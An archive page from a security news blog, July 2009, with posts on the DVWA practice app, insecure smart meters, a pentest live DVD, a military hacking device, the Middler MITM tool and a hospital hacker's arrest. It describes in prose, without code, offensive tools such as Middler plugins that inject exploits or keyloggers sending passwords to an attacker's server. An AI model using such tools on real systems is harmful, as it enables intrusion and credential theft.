Archive | July, 2009

Damn Vulnerable Web App – Learn & Practise Web Hacking

Don't let your data go over to the Dark Side!


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be light weight, easy to use and full of vulnerabilities to exploit. Used to learn or teach the art of web application security.

Vulnerabilities

  • SQL Injection
  • XSS (Cross Site Scripting)
  • LFI (Local File Inclusion)
  • RFI (Remote File Inclusion)
  • Command Execution
  • Upload Script
  • Login Brute Force

Changes


  • Added Acunetix scan report.
  • All links use http://hiderefer.com to hide referrer header.
  • Updated/added ‘more info’ links.
  • Moved change log info to CHANGELOG.txt.
  • Fixed the exec.php UTF-8 output.
  • Moved Help/View source buttons to footer.
  • Fixed phpInfo bug.
  • Made DVWA IE friendly.
  • Fixed html bugs.
  • Improved README.txt and fixed typos.
  • Made SQL injection possible in sqli_med.php.

WARNING

It should come as no shock..but this application is damn vulnerable! Do not upload it to your hosting provider’s public html folder or any working web server as it will be hacked. It’s recommend that you download and install XAMP onto a local machine inside your LAN which is used solely for testing.

You can download DVWA 1.0.4 here:

dvwa_v1.0.4.zip

Or read more here.


Posted in: Exploits/Vulnerabilities, Programming, Web Hacking

Tags: , , , , , , , , , , , , , ,

Posted in: Exploits/Vulnerabilities, Programming, Web Hacking | Add a Comment
Recent in Exploits/Vulnerabilities:
- BeautifulPeople.com Leak Exposes 1.1M Extremely Private Records
- Apple Will Not Patch Windows QuickTime Vulnerabilities
- BADLOCK – Are ‘Branded’ Exploits Going Too Far?

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 234,370 views
- AJAX: Is your application secure enough? - 120,031 views
- eEye Launches 0-Day Exploit Tracker - 85,488 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Smart Grid Security Risks – Not So Smart Electricity Meters

Cybertroopers storming your ship?


You might recall we’ve discussed the security of Industrial Control Systems before, the latest ‘evolution’ is the so called Smart Grid.

Which in all honestly, doesn’t seem to be very smart at all. In basic terms they are trying to turn the power-grid into a two way communication medium so consumers homes can report back to the grid what they are using and they can be disconnected via software rather than requiring physical intervention.

The scary part is there’s no encryption and many things are done without authentication, meaning with a little reverse engineering you can probably shut down the power to anyone on the not-so-smart grid.

New electricity meters being rolled out to millions of homes and businesses are riddled with security bugs that could bring down the power grid, according to a security researcher who plans to demonstrate several attacks at a security conference next month.

The so-called smart meters for the first time provide two-way communications between electricity users and the power plants that serve them. Prodded by billions of dollars from President Obama’s economic stimulus package, utilities in Seattle, Houston, Miami, and elsewhere are racing to install them as part of a plan to make the power grid more efficient. Their counterparts throughout Europe are also spending heavily on the new technology.

There’s just one problem: The newfangled meters needed to make the smart grid work are built on buggy software that’s easily hacked, said Mike Davis, a senior security consultant for IOActive. The vast majority of them use no encryption and ask for no authentication before carrying out sensitive functions such as running software updates and severing customers from the power grid. The vulnerabilities, he said, are ripe for abuse.

An embedded hardware system that will accept new firmware without authentication and nothing is encrypted? That is a hackers playground!

I hope they consider re-architecting the whole system ASAP on a secure platform and rolling that out as a software update. This is no small matter, this is the power grid we are talking about here – lives and business can be seriously effected by someone malicious who wanted to screw up the system.

Imagine if you work out the system and get in there first installing your own firmware which won’t accept any more updates from the main Grid system.

“For an embedded platform, they’re kind of scary,” he said. “It’s really not designed from the ground up for security. Just imagine if somebody is outside your house and has the unique identifier that’s printed on your meter.”

Companies that make gear for smart grids include GE Energy, The ABB Group, Sensus Metering, Itron and Landis+Gyr

One deficiency common among many of the meters is the use of insecure programming functions, such as memcpy() and strcpy(), which are two of the most common sources of exploitable software bugs. In many cases, the devices use general purpose hardware and software that aren’t designed for highly targeted or mission critical systems.

And all paid for by the new president and his generous stimulus packages. It seems like the whole thing has been taped together with band-aids.

There’s no excuse at all for using insecure programming functions in this day and age, I mean it’s 2009 for goodness sake.

How long has C programming been around now? And the concept of security and secure programming, especially for critical infrastructure systems like this.

Source: The Register (Thanks Alan)


Posted in: Hardware Hacking, Legal Issues

Tags: , , , , , , , , , , ,

Posted in: Hardware Hacking, Legal Issues | Add a Comment
Recent in Hardware Hacking:
- Kid Gets Arrested For Building A Clock – World Goes NUTS
- The Jeep HACK – What You Need To Know
- Rowhammer – DDR3 Exploit – What You Need To Know

Related Posts:

Most Read in Hardware Hacking:
- Elevator/Lift Hacking !!!!! - 78,898 views
- Military Communications Hacking – Script Kiddy Style - 49,776 views
- Hackers Crack London Tube Oyster Card - 44,702 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


MultiISO LiveDVD v1.0 – BackTrack, Knoppix & Ophcrack

Don't let your data go over to the Dark Side!


MultiISO LiveDVD is an integrated Live DVD technology which combines some of the very popular Live CD ISOs already available on the internet. It can be used for security reconnaissance, vulnerability identification, penetration testing, system rescue, media center and multimedia, system recovery, etc. It’s a all-in-one multipurpose LiveDVD put together. There’s something in it for everyone.

MultiISO LiveDVD Version 1.0 consists of:

  • Backtrack 3
  • Damn Small Linux (DSL) 4.2.5
  • GeeXboX 1.1
  • Damn Vulnerable Linux (Strychnine) 1.4 edition
  • Knoppix 5.1.1, MPentoo 2006.1
  • Ophcrack 1.2.2 (remastered to contain SSTIC04-5k [720MB] table sets)
  • Puppy Linux 3.01
  • Byzantine OS i586-20040404

You can download MultiISO LiveDVD here (to conserve bandwidth only a Torrent link is available, please seed after downloading):

Torrent: EmErgEs_MultiBOOT_ISO.torrent (4.03GB)

MD5SUM: 1b1f37ed6b6f958cde0529a8a1f06637
SHA1SUM: 593ffbfa3c4b665220dcd63b2e4b77bacde5237d

Or read more here.


Posted in: Hacking Tools, Linux Hacking, Network Hacking, Password Cracking

Tags: , , , , , , , , , , , , , ,

Posted in: Hacking Tools, Linux Hacking, Network Hacking, Password Cracking | Add a Comment
Recent in Hacking Tools:
- SubBrute – Subdomain Brute-forcing Tool
- The Backdoor Factory (BDF) – Patch Binaries With Shellcode
- Gdog – Python Windows Backdoor With Gmail Command & Control

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,973,696 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,402,448 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 676,194 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Military Communications Hacking – Script Kiddy Style

Don't let your data go over to the Dark Side!


Ah now this is interesting..and scary in a way. Script Kiddies with guns!

Script kiddies going to war, or is it turning soldiers into script kiddies. Who knows.

Anyway, the US military has decided to make their soldiers walking hackers, with an all-in-one super hacking device that can penetrate satellite signals, VoIP networks and normal information systems.

As the US military strives to boost its ability to wage cyber warfare, it’s looking for ways to make it easier for non-expert soldiers on the front lines to wreak havoc on enemy networks.

Enter a new generation of attack devices that is packaged to be brought into the battlefield and used by non-specialists to penetrate satellites, voice over internet networks, and supervisory control and data acquisition systems. Aviation Week recently got a peek at one device and provided a rich description of its features.

The device is designed to allow US forces to test enemy networks for a wide range of vulnerabilities and then synthesize the results so they can be acted on quickly. It offers touch-screen dashboards and sliders to make enumeration and penetration more intuitive. One display shows a schematic of an enemy network and identifies its nodes. A sliding lever can be moved to increase an attack or dial it down to reduce collateral damage.

Seems like point and click hacking has been taken to a new level and can now be done with a mobile device on the move.

It takes virtually no skill at all with sliders and dials.

I’d love to get my hands on one of these devices just to check it out and see how it actually works, run some packet sniffer on the wire and see if it’s actually just a black box with Metasploit inside and a fancy interface.

The device is designed to take a slew of algorithms for monitoring and penetrating networks and put them into an easy-to-use package. Think of it as a hack-by-numbers gadget for combat forces.

“Right now, all that information is in the head of a few guys that do computer network operations and there is no training system,” one researcher told Aviation Week.

There’s much more here.

Sounds pretty interesting either way, I hope some more news pops up about this in the future and we can get a better look at the device.

I’d love to see some pictures and a video demonstration, I’d imagine though as always they will be rather secretive about it.

Anyway if anyone finds out more info on this, let us know!

Source: The Register (Thanks Simon)


Posted in: Hacking Tools, Hardware Hacking, Network Hacking

Tags: , , , , , , , , , , , , , , ,

Posted in: Hacking Tools, Hardware Hacking, Network Hacking | Add a Comment
Recent in Hacking Tools:
- SubBrute – Subdomain Brute-forcing Tool
- The Backdoor Factory (BDF) – Patch Binaries With Shellcode
- Gdog – Python Windows Backdoor With Gmail Command & Control

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,973,696 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,402,448 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 676,194 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


The Middler – User Session Cloning & MITM Tool

Cybertroopers storming your ship?


The Middler is a Man in the Middle tool to demonstrate protocol middling attacks. Led by Jay Beale, the project involves a team of authors including InGuardians agents Justin Searle and Matt Carpenter. The Middler is intended to man in the middle, or “middle” for short, every protocol for which we can create code.

In our first alpha release, we released a core built by Matt and Jay, with introductory plug-ins by Justin and InGuardians agent Tom Liston. It runs on Linux and Mac OS X, with most of the code functional on Windows and BSD Unix.

The current codebase is in the alpha state, but a beta release is coming soon, with better documentation (see the wiki), easier installation, and even more plug-ins.

Plug-ins

  • plugin-beef.py – inject the Browser Exploitation Framework (BeEF) into any HTTP requests originating on the local LAN
  • plugin-metasploit.py – inject an IFRAME into cleartext (HTTP) requests that loads Metasploit browser exploits
  • plugin-keylogger.py – inject a JavaScript? onKeyPress event handler to cleartext forms that get submitted via HTTPS, forcing the browser to send the password character-by-character to the attacker’s server, before the form is submitted.

The author team has done a tremendous amount of research, design and pseudo-code work, fleshing out attacks on web-based e-mail systems and social networking sites.

Dependencies

The Middler depends on the following Python modules:

  • scapy
  • libpcap
  • readline
  • libdnet
  • beautifulsoup

You can download The Middler here:

middler-alpha-2009022301.tgz

Or read more here.


Posted in: Hacking Tools, Network Hacking, Privacy

Tags: , , , , , , , , , ,

Posted in: Hacking Tools, Network Hacking, Privacy | Add a Comment
Recent in Hacking Tools:
- SubBrute – Subdomain Brute-forcing Tool
- The Backdoor Factory (BDF) – Patch Binaries With Shellcode
- Gdog – Python Windows Backdoor With Gmail Command & Control

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,973,696 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,402,448 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 676,194 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Hospital Hacker GhostExodus Owns Himself – Arrested

Don't let your data go over to the Dark Side!


This story actually gave me a lot of LULZ, how stupid can you be seriously? Man this guy made so many mistakes for someone so paranoid (he had a web cam setup outside his appartment door so he could see who was coming)..

But then he exposed his IP address on IRC, posted his face on some freaky vampire site and posted up screenshots of the HVAC system he ‘owned’ on a forum.

He wasn’t exactly making it hard for someone to find him..especially seen as though he actually WORKED IN THE HOSPITAL.

The leader of a malicious hacker collective who used his job as a security guard to breach sensitive Texas hospital computers has been arrested just days before his group planned a “massive DDoS” attack for the July 4 Independence Day holiday.

Jesse William McGraw, 25, of Arlington, Texas, was taken into custody late Friday evening after posting screenshots showing he had complete control of computers that administered air-conditioning systems at The Carrell Clinic in Dallas, federal prosecutors said. McGraw also brazenly posted videos showing him installing malware on hospital computers that made them part of a botnet he operated, said a network security expert, whose sleuthing uncovered the breach.

As a contract security guard at the hospital, McGraw had no authorized access to any of its computers. But that didn’t stop the miscreant, who went by the handle GhostExodus, from taping himself as he walked down the halls of the hospital with a blue security guard uniform poking out through a gray hoody, as he bragged about gaining control over sensitive computers.

If there was ever an original script kiddy, I think this guy fits the bill perfectly.

Seems like his l33t hacking skills extend to walking into rooms he has access too (with a security card), and taking some screenshots!

Or perhaps even sometimes he booted in with BackTrack and reset the passwords.


“It’s a unique mindset among these hackers,” said Wesley McGrew, a 29-year-old network PhD network security researcher at Mississippi State University. “It’s all about respect and fame and the respect of their equally weird peers.”

According to McGrew and federal prosecutors in Dallas, McGraw was the leader of a hacker gang known as the Electronik Tribulation Army. He had recently posted videos admonishing fellow hackers to carry out a “massive DDoS,” or distributed denial of service, attack on July 4, a date he called “Devil’s Day”. While the target and other details of the attack are unknown, the investigators are taking the threat seriously because McGraw, prior to his arrest, had tendered his resignation as a security guard job effective July 3.

According to court documents, hospital officials had experienced problems with their HVAC, or heating, ventilation and air-conditioning, units and were perplexed why none of the system alarms had gone off as programmed. Had they seen screenshots posted here by someone calling themselves GhostExodus, they would have known why. They images showed the HVAC control window for the hospital’s surgery unit. A test alarm setting was turned to “inactive.”

“You almost can’t help it ya know,” GhostExodus writes. “It must be done!”

Yah you just can’t help messing with the critical HVAC system of a hospital YOU TOOL. What is the point of that anyway, other than bragging rights (which will only impress other script kiddies).

Who knows…I guess if he had any real skills he wouldn’t be working as a security guard and he’d actually be using his talent to make some real bank.

Oh well, good luck to you I say GhostExodus.

Source: The Register


Posted in: General Hacking, Legal Issues, Malware

Tags: , , , , , , , , , , , ,

Posted in: General Hacking, Legal Issues, Malware | Add a Comment
Recent in General Hacking:
- Dradis – Reporting Platform For IT Security Professionals
- Kid Gets Arrested For Building A Clock – World Goes NUTS
- Drones, Tor & Remailers – The Story Of A High-Tech Kidnapping

Related Posts:

Most Read in General Hacking:
- 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) - 1,168,348 views
- Hack Tools/Exploits - 622,565 views
- Password Cracking with Rainbowcrack and Rainbow Tables - 432,663 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95